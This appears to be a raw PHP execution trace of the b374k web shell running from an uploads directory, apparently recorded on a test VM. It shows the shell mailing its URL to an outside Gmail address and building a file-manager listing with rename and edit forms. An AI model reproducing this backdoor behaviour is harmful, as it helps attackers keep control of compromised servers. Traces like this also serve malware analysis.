3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mes .= 'URL: /uploads/xc.php\n'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mes .= 'Referer: '
4 71 0 0.010043 697520 mail 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 4 'free.d0ing.1987@gmail.com' 'backdoor b374k' 'username: ????:????\npassword: \nURL: /uploads/xc.php\nReferer: ' 'From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n'
4 71 1 0.011030 697664
4 71 R FALSE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i = 0
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $parent .= '/'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $parent .= 'var/'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $parent .= 'www/'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $parent .= 'html/'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
4 72 0 0.011165 697560 fileowner 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.'
4 72 1 0.011190 697592
4 72 R 0
4 73 0 0.011209 697552 posix_getpwuid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 73 1 0.011250 698352
4 73 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 74 0 0.011320 698320 filegroup 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.'
4 74 1 0.011342 698360
4 74 R 0
4 75 0 0.011366 698320 posix_getgrgid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 75 1 0.011408 698976
4 75 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 76 0 0.011490 699200 get_perms 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 77 0 0.011513 699200 fileperms 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 77 1 0.011542 699256
5 77 R 16895
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 76 1 0.011760 699256
4 76 R 'rwxrwxrwx'
4 78 0 0.011788 699248 filemtime 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
4 78 1 0.011808 699288
4 78 R 1676242950
4 79 0 0.011826 699248 date 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242950
4 79 1 0.011904 701640
4 79 R '12-Feb-2023 18:02'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/uploads/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 18:02</td><td><span id="titik1"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/uploads/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik1\',\'titik1_form\');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hid'
4 80 0 0.011959 701856 fileowner 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '..'
4 80 1 0.011977 701880
4 80 R 0
4 81 0 0.011990 701840 posix_getpwuid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 81 1 0.012016 702640
4 81 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 82 0 0.012059 701840 filegroup 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '..'
4 82 1 0.012073 701880
4 82 R 0
4 83 0 0.012085 701840 posix_getgrgid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 83 1 0.012108 702496
4 83 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 84 0 0.012158 702032 get_perms 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/'
5 85 0 0.012173 702032 fileperms 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/'
5 85 1 0.012189 702080
5 85 R 16895
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 84 1 0.012371 702080
4 84 R 'rwxrwxrwx'
4 86 0 0.012389 702072 filemtime 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/'
4 86 1 0.012404 702112
4 86 R 1676242950
4 87 0 0.012418 702072 date 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242950
4 87 1 0.012451 702400
4 87 R '12-Feb-2023 18:02'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 18:02</td><td><span id="titik2"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik2\',\'titik2_form\');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" v'
4 88 0 0.012501 702360 fileowner 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
4 88 1 0.012519 702392
4 88 R 0
4 89 0 0.012532 702352 posix_getpwuid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 89 1 0.012558 703152
4 89 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 90 0 0.012601 702352 filegroup 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
4 90 1 0.012615 702392
4 90 R 0
4 91 0 0.012628 702352 posix_getgrgid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 91 1 0.012650 703008
4 91 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 92 0 0.012700 702352 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
5 93 0 0.012714 702352 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 93 1 0.012729 702448
5 93 R 'data'
4 92 1 0.012743 702352
4 92 R 'data'
4 94 0 0.012757 702544 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
5 95 0 0.012769 702544 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 95 1 0.012783 702640
5 95 R 'data'
4 94 1 0.012796 702544
4 94 R 'data'
4 96 0 0.012809 702992 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
5 97 0 0.012822 702992 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 97 1 0.012836 703088
5 97 R 'data'
4 96 1 0.012848 702992
4 96 R 'data'
4 98 0 0.012861 702992 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
5 99 0 0.012873 702992 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 99 1 0.012887 703088
5 99 R 'data'
4 98 1 0.012899 702992
4 98 R 'data'
4 100 0 0.012912 703176 get_perms 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 101 0 0.012926 703176 fileperms 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 101 1 0.012942 703240
5 101 R 16895
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 100 1 0.013060 703240
4 100 R 'rwxrwxrwx'
4 102 0 0.013074 703144 filemtime 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
4 102 1 0.013089 703160
4 102 R 1676242950
4 103 0 0.013103 703120 date 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242950
4 103 1 0.013134 703448
4 103 R '12-Feb-2023 18:02'
4 104 0 0.013148 703120 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
5 105 0 0.013161 703120 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 105 1 0.013179 703216
5 105 R 'data'
4 104 1 0.013193 703120
4 104 R 'data'
4 106 0 0.013206 703248 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
5 107 0 0.013219 703248 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 107 1 0.013233 703344
5 107 R 'data'
4 106 1 0.013246 703248
4 106 R 'data'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="data_link" href="?y=/var/www/html/uploads/data/">[ data ]</a> <form action="?y=/var/www/html/uploads/" method="post" id="data_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="data" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="data" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/.htaccess'
4 108 0 0.013298 703944 fileowner 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
4 108 1 0.013314 703992
4 108 R 0
4 109 0 0.013327 703952 posix_getpwuid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 109 1 0.013350 704752
4 109 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 110 0 0.013392 703952 filegroup 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
4 110 1 0.013406 703992
4 110 R 0
4 111 0 0.013419 703952 posix_getgrgid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 111 1 0.013440 704608
4 111 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 112 0 0.013490 703952 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
5 113 0 0.013503 703952 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 113 1 0.013517 704048
5 113 R '.htaccess'
4 112 1 0.013531 703952
4 112 R '.htaccess'
4 114 0 0.013545 704176 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
5 115 0 0.013558 704176 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 115 1 0.013572 704272
5 115 R '.htaccess'
4 114 1 0.013586 704176
4 114 R '.htaccess'
4 116 0 0.013599 704592 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
5 117 0 0.013612 704592 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 117 1 0.013626 704688
5 117 R '.htaccess'
4 116 1 0.013639 704592
4 116 R '.htaccess'
4 118 0 0.013653 704592 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
5 119 0 0.013666 704592 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 119 1 0.013679 704688
5 119 R '.htaccess'
4 118 1 0.013692 704592
4 118 R '.htaccess'
4 120 0 0.013706 704720 ukuran 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 121 0 0.013720 704720 filesize 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 121 1 0.013736 704776
5 121 R 64
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $size = 64
4 120 1 0.013760 704736
4 120 R 64
4 122 0 0.013774 704736 get_perms 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 123 0 0.013787 704736 fileperms 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 123 1 0.013801 704776
5 123 R 33188
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mode = 33188
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 122 1 0.013924 704776
4 122 R 'rw-r--r--'
4 124 0 0.013938 704864 filemtime 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
4 124 1 0.013952 704904
4 124 R 1676242950
4 125 0 0.013965 704864 date 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242950
4 125 1 0.013997 705192
4 125 R '12-Feb-2023 18:02'
4 126 0 0.014012 704992 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
5 127 0 0.014025 704992 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 127 1 0.014039 705088
5 127 R '.htaccess'
4 126 1 0.014053 704992
4 126 R '.htaccess'
4 128 0 0.014066 704992 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
5 129 0 0.014079 704992 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 129 1 0.014093 705088
5 129 R '.htaccess'
4 128 1 0.014106 704992
4 128 R '.htaccess'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= '<tr><td><a id=".htaccess_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/.htaccess">.htaccess</a> <form action="?y=/var/www/html/uploads/" method="post" id=".htaccess_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value=".htaccess" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value=".htaccess" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" '
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/prepend.php'
4 130 0 0.014158 708072 fileowner 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
4 130 1 0.014175 708096
4 130 R 0
4 131 0 0.014188 708056 posix_getpwuid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 131 1 0.014211 708856
4 131 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 132 0 0.014253 708056 filegroup 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
4 132 1 0.014268 708096
4 132 R 0
4 133 0 0.014280 708056 posix_getgrgid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 133 1 0.014302 708712
4 133 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 134 0 0.014351 708056 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
5 135 0 0.014365 708056 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 135 1 0.014380 708152
5 135 R 'prepend.php'
4 134 1 0.014394 708056
4 134 R 'prepend.php'
4 136 0 0.014416 708280 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
5 137 0 0.014429 708280 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 137 1 0.014444 708376
5 137 R 'prepend.php'
4 136 1 0.014458 708280
4 136 R 'prepend.php'
4 138 0 0.014472 708696 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
5 139 0 0.014485 708696 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 139 1 0.014499 708792
5 139 R 'prepend.php'
4 138 1 0.014512 708696
4 138 R 'prepend.php'
4 140 0 0.014525 708696 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
5 141 0 0.014542 708696 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 141 1 0.014557 708792
5 141 R 'prepend.php'
4 140 1 0.014570 708696
4 140 R 'prepend.php'
4 142 0 0.014584 708824 ukuran 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 143 0 0.014598 708824 filesize 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 143 1 0.014614 708888
5 143 R 57
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $size = 57
4 142 1 0.014639 708848
4 142 R 57
4 144 0 0.014652 708848 get_perms 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 145 0 0.014667 708848 fileperms 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 145 1 0.014681 708888
5 145 R 33261
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mode = 33261
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'x'
4 144 1 0.014800 708888
4 144 R 'rwxr-xr-x'
4 146 0 0.014814 708976 filemtime 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
4 146 1 0.014828 709016
4 146 R 1676242950
4 147 0 0.014842 708976 date 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242950
4 147 1 0.014873 709304
4 147 R '12-Feb-2023 18:02'
4 148 0 0.014888 709104 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
5 149 0 0.014902 709104 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 149 1 0.014917 709200
5 149 R 'prepend.php'
4 148 1 0.014931 709104
4 148 R 'prepend.php'
4 150 0 0.014945 709104 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
5 151 0 0.014958 709104 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 151 1 0.014972 709200
5 151 R 'prepend.php'
4 150 1 0.014986 709104
4 150 R 'prepend.php'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="prepend.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/prepend.php">prepend.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="prepend.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="prepend.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="prepend.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class='
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/xc.php'
4 152 0 0.015037 708072 fileowner 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
4 152 1 0.015053 708080
4 152 R 1000
4 153 0 0.015066 708040 posix_getpwuid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 1000
4 153 1 0.015098 708856
4 153 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $name = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4 154 0 0.015142 708056 filegroup 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
4 154 1 0.015156 708096
4 154 R 1000
4 155 0 0.015169 708056 posix_getgrgid 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 1000
4 155 1 0.015200 708712
4 155 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $group = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $owner = 'osboxes<span class="gaya"> : </span>osboxes'
4 156 0 0.015256 708072 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
5 157 0 0.015270 708072 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'xc.php'
5 157 1 0.015284 708168
5 157 R 'xc.php'
4 156 1 0.015298 708072
4 156 R 'xc.php'
4 158 0 0.015312 708296 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
5 159 0 0.015325 708296 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'xc.php'
5 159 1 0.015340 708392
5 159 R 'xc.php'
4 158 1 0.015353 708296
4 158 R 'xc.php'
4 160 0 0.015367 708712 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
5 161 0 0.015380 708712 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'xc.php'
5 161 1 0.015394 708808
5 161 R 'xc.php'
4 160 1 0.015407 708712
4 160 R 'xc.php'
4 162 0 0.015421 708712 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
5 163 0 0.015434 708712 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'xc.php'
5 163 1 0.015448 708808
5 163 R 'xc.php'
4 162 1 0.015461 708712
4 162 R 'xc.php'
4 164 0 0.015474 708712 ukuran 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/xc.php'
5 165 0 0.015487 708712 filesize 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/xc.php'
5 165 1 0.015503 708776
5 165 R 14428
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $size = 14428
5 166 0 0.015528 708736 round 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 14.08984375 2
5 166 1 0.015543 708808
5 166 R 14.09
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $size = 14.09
4 164 1 0.015569 708776
4 164 R '14.09 kb'
4 167 0 0.015583 708864 get_perms 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/xc.php'
5 168 0 0.015597 708864 fileperms 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/xc.php'
5 168 1 0.015611 708904
